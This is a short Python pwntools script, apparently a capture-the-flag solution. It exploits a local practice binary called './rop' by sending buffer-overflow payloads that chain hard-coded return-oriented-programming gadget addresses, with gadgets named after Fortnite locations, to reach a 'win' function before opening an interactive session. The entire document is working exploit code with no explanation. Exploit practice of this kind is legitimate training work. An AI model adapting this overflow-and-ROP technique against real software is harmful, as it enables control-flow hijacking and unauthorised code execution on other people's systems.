#!/usr/bin/env python3

from pwn import *

# Our ROP-gadgets
tilted_towers = p32(0x0804937c)
junk_junction = p32(0x0804954a)
snobby_shores = p32(0x08049416)
greasy_grove = p32(0x080495e4)
lonely_lodge = p32(0x080492e2)
dusty_depot = p32(0x080494b0)
win = p32(0x0804967e)
pop_ebx = p32(0x0804901e)
pop_ebx_ebp = p32(0x080492df)
main = p32(0x08049714)

# These are the functions that need to be called (in this order)
ropchain = [
    tilted_towers,
    junk_junction,
    snobby_shores,
    greasy_grove,
    lonely_lodge,
    dusty_depot,
]

conn = process("./rop")
conn.recvline()
conn.recvline()

conn.send(b"A" * 8 + pop_ebx_ebp + p32(0) + main + win)
conn.recvline()
conn.recvline()

for gadget in reversed(ropchain):
    conn.send(b"A" * 8 + gadget + pop_ebx_ebp + main + b"\n")
    conn.recvline()
    conn.recvline()

conn.send(b"A" * 16 + pop_ebx + b"\n")

conn.interactive()

conn.close()
